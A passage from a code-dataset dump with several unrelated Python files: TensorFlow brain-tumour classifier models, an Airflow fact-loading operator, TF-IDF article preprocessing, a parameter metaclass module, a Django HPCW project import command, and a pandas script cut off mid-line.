# n: batch size\n # c: the number of feaure maps\n # (or the number of filters)\n shape = code.get_shape().as_list()\n n, c = shape[0], shape[-1]\n\n # As the input tensor could be 5D or 4D,\n # set up parameters for different inputs\n if len(shape) == 5:\n transpose_perm = [0, 4, 1, 2, 3]\n threshold_shape = [n, 1, 1, 1, c]\n elif len(shape) == 4:\n transpose_perm = [0, 3, 1, 2]\n threshold_shape = [n, 1, 1, c]\n else:\n raise ValueError(\"Cannot handle with the input.\")\n\n code_transpose = tf.transpose(code, transpose_perm)\n code_reshape = tf.reshape(code_transpose, [n, c, -1])\n\n # Get top k values of code\n code_top_k, _ = tf.nn.top_k(code_reshape, k)\n # Get the minimum of top k values to do thresholding\n code_top_k_min = code_top_k[..., k - 1]\n\n # Threshold the code, the indices of top k values is 1,\n # and set others to 0\n threshold = tf.reshape(code_top_k_min, threshold_shape)\n drop_map = tf.where(code < threshold,\n tf.zeros(shape, tf.float32),\n tf.ones(shape, tf.float32))\n\n # Keep top k value in code\n code = code * drop_map\n # Save top k values as winner\n winner = tf.reshape(code_top_k, [n, c, k])\n\n return code, winner\n\n # The function to carry out lifetime sparsity.\n # For example, the batch size is 64, which means each\n # filter will lead to 64 winners, lifetime sparsity\n # is going to keep largest winners in the percentage of\n # self.lifetime_rate, and set others to zeros. Those left\n # feature maps are winners in winners.\n def lifetime_sparsity(code, winner):\n # Obtain the shape of code and winner\n # n: batch size\n # c: the number of feaure maps\n # (or the number of filters)\n # k: the number of winners to be kept\n code_shape = code.get_shape().as_list()\n winner_shape = winner.get_shape().as_list()\n n, c = winner_shape[0], winner_shape[1]\n k = int(self.lifetime_rate * n) + 1\n\n # Compute mean value of each winner\n winner_mean = tf.reduce_mean(winner, axis=2)\n winner_mean = tf.transpose(winner_mean)\n # Get top k mean values of top k winners\n winner_mean_top_k, _ = tf.nn.top_k(winner_mean, k)\n # Get the minimum of top k values to do thresholding\n winner_mean_top_k_min = winner_mean_top_k[..., k - 1]\n winner_mean_top_k_min = tf.reshape(winner_mean_top_k_min, [c, 1])\n\n # Threshold the winner, the indices of top k winners is 1,\n # and set others to 0\n drop_map = tf.where(winner_mean < winner_mean_top_k_min,\n tf.zeros([c, n], tf.float32),\n tf.ones([c, n], tf.float32))\n drop_map = tf.transpose(drop_map)\n\n # As the input tensor could be 5D or 4D,\n # set up parameters for different inputs\n if len(code_shape) == 5:\n reform_shape = [n, 1, 1, 1, c]\n elif len(code_shape) == 4:\n reform_shape = [n, 1, 1, c]\n else:\n raise ValueError(\"Cannot handle with the input.\")\n\n # Keep top k winners in code\n code = code * tf.reshape(drop_map, reform_shape)\n\n return code\n\n # Winner-Take-All constraint\n code, winner = spatial_sparsity(code, k)\n code = lifetime_sparsity(code, winner)\n\n return code\n\n def _decoder(self, code):\n '''_DECODER\n\n Decoder section of autoencoder to\n reconstruct code to input.\n\n Input:\n ------\n - code: tensor, compressed representation\n\n Output:\n -------\n - the reconstruction from code\n\n '''\n\n # decode = self._dropout(code, \"de_dropout1\")\n decode = self._deconv_bn_act(code, 512, 3, 2, \"deconv1\")\n # decode = self._dropout(decode, \"de_dropout2\")\n decode = self._deconv_bn_act(decode, 256, 3, 2, \"deconv2\")\n decode = self._deconv_bn_act(decode, 128, 3, 2, \"deconv3\")\n # decode = self._dropout(decode, \"de_dropout3\")\n decode = self._deconv_bn_act(decode, 4, 3, 2, \"deconv4\", False)\n decode = tf.nn.tanh(decode, \"tanh\")\n\n return decode\n\n #\n # Error Check\n #\n\n def _check_input(self, x):\n '''_CHECK_INPUT\n\n Chech the dimentions of input tensor whether\n satisfy the requirement for the model. If not,\n raise an error and quit program.\n\n Input:\n ------\n - x: tensor, the tensor input to the model\n\n '''\n\n # Obtain the shape of input\n x_dims = len(x.get_shape().as_list())\n\n if (x_dims == 5 and (self.dims == \"3d\" or self.dims == \"3D\")) or \\\n (x_dims == 4 and (self.dims == \"2d\" or self.dims == \"2D\")):\n pass\n else: # The input is unwanted\n msg = (\"Your model deals with {0} data, the input tensor should be {1}D. \" +\n \"But your input is {2}D.\").format(self.dims, self.right_dims, x_dims)\n raise ValueError(msg)\n\n return\n\n def _check_output(self, x, output):\n '''_CHECK_OUTPUT\n\n Obtain the dimentions of input and ouput respectively,\n and check whether they are same. If not, raise an error\n and quit program. This check is only for AUTOENCODER.\n\n Inputs:\n -------\n - x: tensor, the input tensor\n - output: tensor, the output generated from model\n\n '''\n\n # Obtain dimentions\n x_dims = x.get_shape().as_list()\n output_dims = output.get_shape().as_list()\n\n if x_dims == output_dims:\n return\n else: # They ate not same\n msg = (\"Input tensor shape: {0}, output tensor shape: {1}. \" +\n \"They should be same.\").format(x_dims, output_dims)\n raise ValueError(msg)\n\n return\n\n #\n # A Simple Test Case\n #\n\n def test(self, x, is_training):\n '''_TEST\n\n A function to test basic helpers.\n\n Inputs:\n -------\n - x: tensor placeholder, input volumes in batch\n - is_training: boolean placeholder, indicates the mode,\n True: training mode,\n False: validating and inferencing mode\n\n '''\n\n self._check_input(x)\n self.is_training = is_training\n\n net = self._conv_bn_act(x, 2, 3, 1, \"layer1\")\n net = self._max_pool(net, 2, \"max_pool1\")\n net = self._conv_bn_act(net, 2, 3, 1, \"layer2\")\n net = self._average_pool(net, 2, \"avg_pool2\")\n net = self._conv_bn_act(net, 2, 3, 1, \"layer3\")\n net = self._max_pool(net, 2, \"max_pool3\")\n net = self._flatten(net, \"flatten\")\n net = self._fc_bn_act(net, 64, \"fcn1\")\n net = self._dropout(net, \"drop1\")\n net = self._fc_bn_act(net, 64, \"fcn2\")\n net = self._dropout(net, \"drop2\")\n net = self._logits_fc(net, \"logits\")\n net = tf.nn.softmax(logits=net, name=\"softmax\")\n\n print(\"Simple test of Class BTCModels\")\n print(\"Input n volumes in 3 classes\")\n print(\"Output probabilities' shape: \", net.shape)\n\n return\n\n #\n # Contruct Models\n #\n\n def cnn(self, x, is_training):\n '''CNN\n\n VGG-like CNN model.\n\n Inputs:\n -------\n - x: tensor placeholder, input volumes in batch\n - is_training: boolean placeholder, indicates the mode,\n True: training mode,\n False: validating and inferencing mode\n\n Output:\n -------\n - output logits after VGG-like CNN\n\n '''\n\n self._check_input(x)\n self.is_training = is_training\n\n # Here is a very simple case to test btc_train first\n net = self._conv_bn_act(x, 32, 3, 1, \"layer1\")\n net = self._conv_bn_act(net, 32, 3, 1, \"layer2\")\n net = self._pooling(net, 2, \"max\", \"max_pool1\")\n net = self._dropout(net, \"dropout1\")\n net = self._conv_bn_act(net, 64, 3, 1, \"layer3\")\n net = self._conv_bn_act(net, 64, 3, 1, \"layer4\")\n net = self._pooling(net, 2, \"max\", \"max_pool2\")\n net = self._dropout(net, \"dropout2\")\n net = self._conv_bn_act(net, 128, 3, 1, \"layer5\")\n net = self._conv_bn_act(net, 128, 3, 1, \"layer6\")\n net = self._pooling(net, 2, \"max\", \"max_pool3\")\n net = self._dropout(net, \"dropout3\")\n net = self._conv_bn_act(net, 256, 3, 1, \"layer7\")\n net = self._conv_bn_act(net, 256, 3, 1, \"layer8\")\n net = self._pooling(net, -1, \"max\", \"global_maxpool\")\n net = self._flatten(net, \"flatten\")\n net = self._dropout(net, \"dropout4\")\n net = self._fc_bn_act(net, 256, \"fc1\")\n net = self._dropout(net, \"dropout5\")\n net = self._fc_bn_act(net, 512, \"fc2\")\n net = self._dropout(net, \"dropout6\")\n net = self._logits_fc(net, \"logits\")\n\n return net\n\n def _cnn_branch(self, x, branch):\n net = self._conv_bn_act(x, 16, 3, 1, branch + \"_layer1\")\n net = self._conv_bn_act(net, 16, 3, 1, branch + \"_layer2\")\n # net = self._conv_bn_act(net, 16, 3, 1, branch + \"_layer3\")\n net = self._pooling(net, 2, \"max\", branch + \"maxpool1\")\n net = self._conv_bn_act(net, 32, 3, 1, branch + \"_layer4\")\n # net = self._conv_bn_act(net, 32, 3, 1, branch + \"_layer5\")\n net = self._conv_bn_act(net, 32, 3, 1, branch + \"_layer6\")\n net = self._pooling(net, 2, \"max\", branch + \"maxpool2\")\n net = self._conv_bn_act(net, 64, 3, 1, branch + \"_layer7\")\n net = self._conv_bn_act(net, 64, 3, 1, branch + \"_layer8\")\n net = self._conv_bn_act(net, 64, 3, 1, branch + \"_layer9\")\n net = self._pooling(net, 2, \"max\", branch + \"maxpool3\")\n net = self._conv_bn_act(net, 128, 3, 1, branch + \"_layer10\")\n net = self._conv_bn_act(net, 128, 3, 1, branch + \"_layer11\")\n net = self._conv_bn_act(net, 128, 3, 1, branch + \"_layer12\")\n\n # net = self._pooling(net, -1, \"max\", branch + \"_global_maxpool\")\n # net = self._flatten(net, \"flatten\")\n\n return net\n\n def _res_branch(self, x, branch):\n net = self._conv_bn_act(x, 16, 5, 1, branch + \"_preconv\")\n net = self._res_block(net, [16, 16, 16], 1, branch + \"_res1\")\n net = self._res_block(net, [16, 32, 32], 2, branch + \"_res2\")\n net = self._res_block(net, [32, 32, 32], 1, branch + \"_res3\")\n net = self._res_block(net, [32, 64, 64], 2, branch + \"_res4\")\n net = self._res_block(net, [64, 64, 64], 1, branch + \"_res5\")\n net = self._res_block(net, [64, 128, 128], 2, branch + \"_res6\")\n net = self._res_block(net, [128, 256, 256], 1, branch + \"_res7\")\n\n net = self._pooling(net, -1, \"max\", branch + \"_global_maxpool\")\n net = self._flatten(net, \"flatten\")\n\n return net\n\n def multi_cnn(self, x, is_training):\n self._check_input(x)\n self.is_training = is_training\n\n dims = x.get_shape().as_list()[:-1] + [1]\n input0 = tf.reshape(x[..., 0], dims)\n input1 = tf.reshape(x[..., 1], dims)\n input2 = tf.reshape(x[..., 2], dims)\n input3 = tf.reshape(x[..., 3], dims)\n\n # net0 = self._cnn_branch(input0, \"branch0\")\n # net1 = self._cnn_branch(input1, \"branch1\")\n # net2 = self._cnn_branch(input2, \"branch2\")\n # net3 = self._cnn_branch(input3, \"branch3\")\n\n net0 = self._res_branch(input0, \"branch0\")\n net1 = self._res_branch(input1, \"branch1\")\n net2 = self._res_branch(input2, \"branch2\")\n net3 = self._res_branch(input3, \"branch3\")\n\n # nets = [net0]\n\n net = tf.concat([net0, net1, net2, net3], 1, \"concate\")\n # net = tf.concat([net0, net1, net2, net3], 4, \"concate\")\n # net = self._dropout(net, \"dropout1\")\n # net = self._conv_bn_act(net, 256, 3, 1, \"layer1\")\n # net = self._conv_bn_act(net, 256, 3, 1, \"layer2\")\n\n # net = self._pooling(net, -1, \"max\", \"global_maxpool\")\n # net = self._flatten(net, \"flatten\")\n\n net = self._dropout(net, \"dropout1\")\n # net = self._fc_bn_act(net, 1024, \"fc1\")\n # net = self._dropout(net, \"dropout2\")\n # net = self._fc_bn_act(net, 1024, \"fc2\")\n # net = self._dropout(net, \"dropout3\")\n net = self._logits_fc(net, \"logits\")\n\n return net\n\n def full_cnn(self, x, is_training):\n '''FULL_CNN\n\n CNN with convolutional logits layer, without\n fully connected layers.\n\n Inputs:\n -------\n - x: tensor placeholder, input volumes in batch\n - is_training: boolean placeholder, indicates the mode,\n True: training mode,\n False: validating and inferencing mode\n\n Output:\n -------\n - output logits after Fully CNN\n\n '''\n\n self._check_input(x)\n self.is_training = is_training\n\n # Here is a very simple case to test btc_train first\n net = self._conv_bn_act(x, 32, 3, 1, \"layer1\")\n net = self._pooling(net, 2, \"max\", \"max_pool1\")\n net = self._dropout(net, \"dropout1\")\n net = self._conv_bn_act(net, 64, 3, 1, \"layer2\")\n net = self._pooling(net, 2, \"max\", \"max_pool2\")\n net = self._dropout(net, \"dropout2\")\n net = self._conv_bn_act(net, 128, 3, 1, \"layer3\")\n net = self._pooling(net, 2, \"max\", \"max_pool3\")\n net = self._dropout(net, \"dropout3\")\n net = self._conv_bn_act(net, 256, 3, 1, \"layer4\")\n net = self._dropout(net, \"dropout4\")\n net = self._logits_conv(net, \"logits_conv\")\n net = self._flatten(net, \"logits_flatten\")\n\n return net\n\n def res_cnn(self, x, is_training):\n '''RES_CNN\n\n Residual CNN (ResNet).\n\n Inputs:\n -------\n - x: tensor placeholder, input volumes in batch\n - is_training: boolean placeholder, indicates the mode,\n True: training mode,\n False: validating and inferencing mode\n\n Output:\n -------\n - output logits after ResNet\n\n '''\n\n self._check_input(x)\n self.is_training = is_training\n\n # Here is a very simple case to test btc_train first\n net = self._conv_bn_act(x, 16, 5, 1, \"preconv\")\n net = self._res_block(net, [16, 16, 16], 1, \"res1\")\n net = self._res_block(net, [16, 16, 16], 1, \"res2\")\n net = self._res_block(net, [16, 32, 32], 2, \"res3\")\n net = self._res_block(net, [32, 32, 32], 1, \"res4\")\n net = self._res_block(net, [32, 32, 32], 1, \"res5\")\n net = self._res_block(net, [32, 64, 64], 2, \"res6\")\n net = self._res_block(net, [64, 64, 64], 1, \"res7\")\n net = self._res_block(net, [64, 64, 64], 1, \"res8\")\n net = self._res_block(net, [128, 128, 128], 2, \"res9\")\n net = self._res_block(net, [128, 128, 128], 1, \"res10\")\n net = self._res_block(net, [128, 256, 256], 1, \"res11\")\n net = self._pooling(net, -1, \"avg\", \"global_avgpool\")\n net = self._flatten(net, \"flatten\")\n net = self._logits_fc(net, \"logits\")\n\n return net\n\n def dense_cnn(self, x, is_training):\n '''DENSE_NET\n\n Densely CNN (DenseNet).\n\n Inputs:\n -------\n - x: tensor placeholder, input volumes in batch\n - is_training: boolean placeholder, indicates the mode,\n True: training mode,\n False: validating and inferencing mode\n\n Output:\n -------\n - output logits after DenseNet\n\n '''\n\n self._check_input(x)\n self.is_training = is_training\n\n # Set the bottleneck symbol\n self.bc = True\n\n # Here is a very simple case to test btc_train first\n # Preconv layer before dense block\n with tf.variable_scope(\"preconv\"):\n net = self._conv(x, 1, 5, 2)\n net = self._dense_block(net, 1, 2, \"dense1\")\n net = self._transition(net, \"trans1\")\n net = self._dense_block(net, 1, 2, \"dense2\")\n net = self._last_transition(net, \"global_avgpool\")\n net = self._flatten(net, \"flatten\")\n net = self._logits_fc(net, \"logits\")\n\n return net\n\n def autoencoder(self, x, is_training, sparse_type=None, k=None):\n '''AUTOENCODER\n\n Autoencoder with stride pooling.\n\n Inputs:\n -------\n - x: tensor placeholder, input volumes in batch\n - is_training: boolean placeholder, indicates the mode,\n True: training mode,\n False: validating and inferencing mode\n - sparse_type: string, \"kl\" or \"wta\"\n - k: int, parameters for Winner-Take-All constraint\n\n Output:\n -------\n - a reconstructed tensor of input\n\n '''\n\n if self.encoder is None:\n raise ValueError(\"Pool method is None.\")\n\n self._check_input(x)\n self.is_training = is_training\n\n # Encoder section\n # code = self.encoder(x)\n\n # Winner-Take-All constraint\n # if sparse_type == \"wta\":\n # code = self._wta_constraint(code, k)\n\n # Decoder section\n # decode = self._decoder(code)\n\n decode = self._encoder_decoder(x)\n\n self._check_output(x, decode)\n\n return decode\n\n def autoencoder_classier(self, x, is_training):\n '''CAE_CLASSIER_STRIDE\n\n Apply pre-trained model to generate code\n for each case. Train logistic regression\n to classify input case.\n\n Inputs:\n -------\n - x: tensor placeholder, input volumes in batch\n - is_training: boolean placeholder, indicates the mode,\n True: training mode,\n False: validating and inferencing mode\n\n Output:\n -------\n - output logits after classifier\n\n '''\n\n self._check_input(x)\n self.is_training = is_training\n\n # Encoder section\n code = self.encoder(x)\n # Global max pooling\n # code_avg = self._pooling(code, -1, \"avg\", \"global_avgpool\")\n # code_max = self._pooling(code, -1, \"max\", \"global_maxpool\")\n # code = tf.concat([code_avg, code_max], 1, \"concat\")\n code = self._flatten(code, \"flatten\")\n code = self._activate(code, \"act\")\n code = self._batch_norm(code, \"bn\")\n code = self._dropout(code, \"dropout1\")\n feat = self._fc_bn_act(code, 128, \"fc1\")\n feat = self._dropout(feat, \"dropout2\")\n # feat = self._fc_bn_act(code, 64, \"fc2\")\n # feat = self._dropout(feat, \"dropout3\")\n output = self._logits_fc(feat, \"logits\")\n\n return output\n\n\nif __name__ == \"__main__\":\n\n models = BTCModels(classes=3, act=\"relu\", alpha=None,\n momentum=0.99, drop_rate=0.5, dims=\"3d\",\n cae_pool=\"stride\", lifetime_rate=0.2)\n\n # Test function for cnn, full_cnn, res_cnn, dense_cnn and autoencoder\n x_3d = tf.placeholder(tf.float32, [32, 49, 49, 49, 4])\n # x_3d = tf.placeholder(tf.float32, [32, 112, 112, 88, 4])\n x_2d = tf.placeholder(tf.float32, [32, 112, 112, 4])\n is_training = tf.placeholder(tf.bool, [])\n\n # models.test(x_3d, is_training)\n # net = models.cnn(x_3d, is_training)\n # net = models.full_cnn(x_3d, is_training)\n # net = models.res_cnn(x_3d, is_training)\n # net = models.dense_cnn(x_3d, is_training)\n # net = models.autoencoder(x_3d, is_training)\n # net = models.autoencoder(x_3d, is_training, \"wta\", 10)\n # net = models.autoencoder_classier(x_3d, is_training)\n net = models.multi_cnn(x_3d, is_training)\n","sub_path":"src/btc_models.py","file_name":"btc_models.py","file_ext":"py","file_size_in_byte":53170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"521876430","text":"from airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\n\nclass LoadFactOperator(BaseOperator):\n\n ui_color = '#F98866'\n \n load_sql = \"INSERT INTO {} {}\"\n \n @apply_defaults\n def __init__(self,\n # Define your operators params (with defaults) here\n # Example:\n redshift_conn_id = \"\",\n table=\"\",\n select_sql_stmt=\"\",\n *args, **kwargs):\n\n super(LoadFactOperator, self).__init__(*args, **kwargs)\n \n self.redshift_conn_id = redshift_conn_id\n self.table = table\n self.select_sql_stmt = select_sql_stmt\n \n \n\n def execute(self, context):\n redshift = PostgresHook(postgres_conn_id=self.redshift_conn_id)\n \n self.log.info(\"LoadFactOperator: execute sql query\")\n load_facts_sql = LoadFactOperator.load_sql.format(self.table, self.select_sql_stmt)\n redshift.run(load_facts_sql)\n","sub_path":"airflow/plugins/operators/load_fact.py","file_name":"load_fact.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"89153214","text":"import numpy as np\r\nimport nltk\r\nimport re\r\nimport pandas as pd\r\nimport sklearn\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.decomposition import PCA\r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.corpus import wordnet\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem import WordNetLemmatizer\r\n\r\n\r\nclass ScrapedArticles():\r\n def __init__(self, articles_list):\r\n self.database = articles_list\r\n self.bagsOfWords = []\r\n self.wordFreq = [{}]\r\n\r\n def clean_database(self):\r\n self.database.remove('')\r\n #remove non-letters\r\n for i in range(0, len(self.database)):\r\n exclusion_list = ['[^a-zA-Z]', 'rt', 'http', 'co', 'RT']\r\n exclusions = '|'.join(exclusion_list)\r\n self.database[i] = re.sub(exclusions, ' ', self.database[i])\r\n self.database[i] = self.database[i].lower()\r\n\r\n #create a bag of words\r\n for i in range(0, len(self.database)):\r\n self.bagsOfWords.append(\r\n word_tokenize(self.database[i])\r\n )\r\n bag = [x for x in self.bagsOfWords[i] if ((not (x in stopwords.words('english'))) and x != \"\") ]\r\n self.bagsOfWords[i] = bag\r\n\r\n #lemmatize to keep 'root' of words\r\n lemmatizer = WordNetLemmatizer()\r\n for s in range(0, len(self.bagsOfWords)):\r\n for i in range(0, len(self.bagsOfWords[s])):\r\n word = self.bagsOfWords[s][i]\r\n self.bagsOfWords[s][i] = lemmatizer.lemmatize(word, self.get_wordnet_pos(word))\r\n\r\n\r\n def find_unique_words(self):\r\n\r\n #find all the words used in the articles and puts it in list\r\n unique_words = []\r\n for i in self.bagsOfWords:\r\n unique_words = set(unique_words).union(set(i))\r\n\r\n\r\n #count all the times a word appears in a doccument\r\n word_count = []\r\n for s in range (0, len(self.bagsOfWords)):\r\n word_count.append(dict.fromkeys(unique_words, 0))\r\n for i in self.bagsOfWords[s]:\r\n word_count[s][i] += 1\r\n self.wordFreq = word_count\r\n\r\n #apply sqrt to reduce the influence of high word counts\r\n for s in range(0, len(self.wordFreq)):\r\n for word in self.wordFreq[s]:\r\n count = self.wordFreq[s][word]\r\n self.wordFreq[s][word] = np.sqrt(count)\r\n\r\n def computeTF(self) -> [{}]:\r\n tfDict = []\r\n for i in range (0, len(self.wordFreq)):\r\n tfDict.append({})\r\n for word, count in self.wordFreq[i].items():\r\n tfDict[i][word] = count/float(len(self.bagsOfWords[i]))\r\n return tfDict\r\n\r\n def computeIDF(self) -> [{}]:\r\n idf = {}\r\n x = 0\r\n for word in self.wordFreq[0]:\r\n for i in range(0, len(self.wordFreq)):\r\n if (self.wordFreq[i].get(word, 0) != 0):\r\n idf[word] = idf.get(word, 0) + 1\r\n idf[word] = len(self.bagsOfWords)/idf.get(word, 0)\r\n x += 1\r\n return idf\r\n\r\n def computeTF_IDF(self):\r\n tf = self.computeTF()\r\n idf = self.computeIDF()\r\n\r\n tf_idf = []\r\n for i in range(0, len(self.wordFreq)):\r\n tf_idf.append({})\r\n for word in self.wordFreq[0]:\r\n tf_idf[i][word] = tf[i].get(word, 0)*idf.get(word, 0)\r\n return tf_idf\r\n\r\n def dimension_reduction(self, df):\r\n df = StandardScaler().fit_transform(df)\r\n pca = PCA(n_components=5)\r\n\r\n principalComponents = pca.fit_transform(df)\r\n principalDf = pd.DataFrame(data=principalComponents\r\n , columns=['principal component 1', 'principal component 2', 'principal component 3', 'principal component 4', 'principal component 5'])\r\n return principalDf\r\n\r\n def get_wordnet_pos(self, word):\r\n \"\"\"Map POS tag to first character lemmatize() accepts\"\"\"\r\n tag = nltk.pos_tag([word])[0][1][0].upper()\r\n tag_dict = {\"J\": wordnet.ADJ,\r\n \"N\": wordnet.NOUN,\r\n \"V\": wordnet.VERB,\r\n \"R\": wordnet.ADV}\r\n\r\n return tag_dict.get(tag, wordnet.NOUN)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Article_Preprocessing.py","file_name":"Article_Preprocessing.py","file_ext":"py","file_size_in_byte":4234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"135377160","text":"# EvilPlot\n# Copyright 2008 Brigham Young University\n#\n# This file is part of EvilPlot.\n#\n# EvilPlot is free software: you can redistribute it and/or modify it under\n# the terms of the GNU General Public License as published by the Free\n# Software Foundation, either version 3 of the License, or (at your option)\n# any later version.\n#\n# EvilPlot is distributed in the hope that it will be useful, but WITHOUT ANY\n# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\n# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more\n# details.\n#\n# You should have received a copy of the GNU General Public License along with\n# EvilPlot. If not, see <http://www.gnu.org/licenses/>.\n#\n# Inquiries regarding any further use of the Materials contained on this site,\n# please contact the Copyright Licensing Office, Brigham Young University,\n# 3760 HBLL, Provo, UT 84602, (801) 422-9339 or 422-3821, e-mail\n# copyright@byu.edu.\n\n\"\"\"param.py: Create objects with inheritable keyword parameters/attributes\n\nAnything that subclasses ParamObj will be an object for which _params is\na special directory of Param objects.\n\"\"\"\n\nfrom six import with_metaclass\n\n\n#TODO: make it so that you can put None in your dictionary to cancel out\n# a parameter defined in one of your superclasses.\n\nclass ParamError(Exception):\n def __init__(self, clsname, paramname):\n self.clsname = clsname\n self.paramname = paramname\n\n def __str__(self):\n return 'Class %s has no parameter \"%s\"' % (self.clsname, self.paramname)\n\n\nclass Param(object):\n \"\"\"A Parameter with name, default value, and documentation.\n\n A list of Params is used by a class of type ParamMeta.\n \"\"\"\n def __init__(self, default=None, doc=None):\n self.default = default\n self.doc = doc\n\n\nclass ParamMeta(type):\n \"\"\"A metaclass that lets you define params.\n\n When creating a new class of type ParamMeta, add a dictionary named\n params into the class namespace. Add Param objects to the dictionary\n with the key being the name of the parameter. Now, each object of the\n class will have an attribute with the appropriate name. The value will\n default to the default value in the Param object, but it can be\n overridden by name in __init__.\n\n Rather than using ParamMeta directly, we recommend that you subclass\n ParamObj, which will allow you to override __init__ as long as you\n call super's __init__.\n \"\"\"\n def __new__(cls, classname, bases, classdict):\n\n # Make sure we have a params dict in classdict.\n if '_params' not in classdict:\n classdict['_params'] = {}\n params = classdict['_params']\n\n # Collect the params from each of the parent classes.\n for base in bases:\n try:\n baseparams = base._params\n except AttributeError:\n # This base class doesn't have a params list.\n continue\n\n for param_name in baseparams:\n if param_name in params:\n if params[param_name].doc is None:\n params[param_name].doc = baseparams[param_name].doc\n else:\n params[param_name] = baseparams[param_name]\n\n # Update documentation based on our parameters\n if '__doc__' not in classdict:\n classdict['__doc__'] = '%s -- Class using Params' % classname\n docs = [('%s: %s (default=%s)' % (param_name,\n params[param_name].doc, params[param_name].default))\n for param_name in params]\n docs.sort()\n classdict['__doc__'] = classdict['__doc__'] + \\\n '\\n '.join(['\\n%s Parameters:' % classname] + docs)\n\n # Write a new __init__ for our classes. If they write their own\n # __init__, we refuse to overwrite it.\n if '__init__' not in classdict:\n def __init__(self, **kwds):\n for key in kwds:\n if key not in self._params:\n raise ParamError(self.__class__.__name__, key)\n for param_name in self._params:\n if param_name in kwds:\n value = kwds[param_name]\n else:\n value = self._params[param_name].default\n setattr(self, param_name, value)\n classdict['__init__'] = __init__\n\n # Create and return the new class\n return type.__new__(cls, classname, bases, classdict)\n\n\nclass ParamObj(with_metaclass(ParamMeta)):\n \"\"\"An object that treats \"_params\" specially.\n\n An object of class ParamObj may contain a dictionary named _params. This\n dictionary should have string keys and Param values. For each entry in\n the dictionary, an object attribute is created with the same name as the\n key, and the value and documentation of the attribute are given by the\n arguments to the Param. Inheritance of _params works right.\n\n Example:\n\n class Rabbit(ParamObj):\n \\\"\\\"\\\"A small rodent, very similar to a hare, which feeds on grass\n and burrows in the earth.\n \\\"\\\"\\\"\n _params = dict(weight=Param(default=42, doc='Body Weight'))\n\n def __init__(self, name, **kwds):\n ParamObj.__init__(**kwds)\n\n >>> m = Mammal()\n >>> m.__doc__\n 'A small rodent, very similar to a hare, which feeds on grass\n and burrows in the earth.\n\n weight: Body Weight (default=42)'\n >>> m.weight\n 42\n >>> m = Mammal(weight=12)\n >>> m.weight\n 12\n \"\"\"\n\n\n__all__ = [ParamObj, Param]\n\n# vim: et sw=4 sts=4\n","sub_path":"evilplot/param.py","file_name":"param.py","file_ext":"py","file_size_in_byte":5628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"337086840","text":"import csv\nimport datetime\n\nfrom django.core.management.base import BaseCommand\nfrom django.db import transaction\n\nfrom project.models import Project\nfrom project.models import ProjectCategory\nfrom project.models import ProjectFundingSource\nfrom project.models import ProjectUserMembership\nfrom users.models import Profile\n\n\nclass Command(BaseCommand):\n help = 'Import HPCW projects from a csv file.'\n\n def add_arguments(self, parser):\n parser.add_argument('csv_filename')\n\n def handle(self, *args, **options):\n try:\n filename = options['csv_filename']\n with open(filename, newline='', encoding='ISO-8859-1') as csvfile:\n next(csvfile)\n reader = csv.reader(csvfile, delimiter=',')\n self.parse_projects(reader)\n except FileNotFoundError:\n self.stdout.write(self.style.ERROR('Unable to open ' + filename))\n\n def parse_projects(self, reader):\n for row in reader:\n try:\n with transaction.atomic():\n self.parse_project(row)\n self.parse_project_membership(row)\n except Exception as e:\n self.stdout.write(self.style.ERROR(str(e)))\n\n def parse_project(self, data):\n _, created = Project.objects.get_or_create(\n legacy_hpcw_id=data[0],\n title='Untitled' if data[2] is '' else data[2],\n description='',\n institution_reference='',\n pi=data[5].title(),\n tech_lead=Profile.objects.get(hpcw_username__iexact=data[6].lower()).user,\n category=ProjectCategory.objects.get(name='Standard Projects - Internally Funded'),\n funding_source=ProjectFundingSource.objects.get(name='N/A'),\n start_date=datetime.datetime.strptime(data[1], '%d/%m/%Y'),\n end_date=datetime.datetime.strptime(data[1], '%d/%m/%Y'),\n allocation_cputime=0,\n allocation_memory=0,\n allocation_storage_home=0,\n allocation_storage_scratch=0,\n status=Project.AWAITING_APPROVAL,\n notes='Imported HPCW Project.',\n )\n if created:\n message = 'Successfully created project {code}.'.format(code=data[0])\n self.stdout.write(self.style.SUCCESS(message))\n else:\n message = 'Project {code} already exists.'.format(code=data[0])\n self.stdout.write(self.style.SUCCESS(message))\n\n def parse_project_membership(self, data):\n project_member_col_index = 8\n while (data[project_member_col_index].strip()):\n user = Profile.objects.get(hpcw_username__iexact=data[project_member_col_index].lower()).user\n _, created = ProjectUserMembership.objects.get_or_create(\n project=Project.objects.get(legacy_hpcw_id=data[0]),\n user=user,\n status=ProjectUserMembership.AWAITING_AUTHORISATION,\n date_joined=datetime.datetime.now(),\n )\n if created:\n message = 'Successfully created project user membership for {hpcw_username}({user}).'.format(\n hpcw_username=user.profile.hpcw_username,\n user=user,\n )\n self.stdout.write(self.style.SUCCESS(message))\n else:\n message = 'Project user membership for {hpcw_username} ({user}) already exists.'.format(\n hpcw_username=user.profile.hpcw_username,\n user=user,\n )\n self.stdout.write(self.style.SUCCESS(message))\n project_member_col_index += 1\n","sub_path":"project/management/commands/add_hpcw_projects.py","file_name":"add_hpcw_projects.py","file_ext":"py","file_size_in_byte":3665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"398714613","text":"import sys\r\nimport pandas as pd\r\n\r\ninputFile=sys.argv[1]\r\noutFile=sys.argv[2]\r\nsizeFile=sys.argv[3]\r\n\r\ndf = pd.read_csv(inputFile,sep=\"\\t\",header=None)\r\ndf[1] = df[1].astype(int)\r\ndf[2] = df[2].astype(int)\r\ndf[3] = df[0]+\":\"+df[1].astype(str)+\"-\"+df[2].astype(str)\r\ndf[4] = df[2]-df[1]\r\ndf[5] = 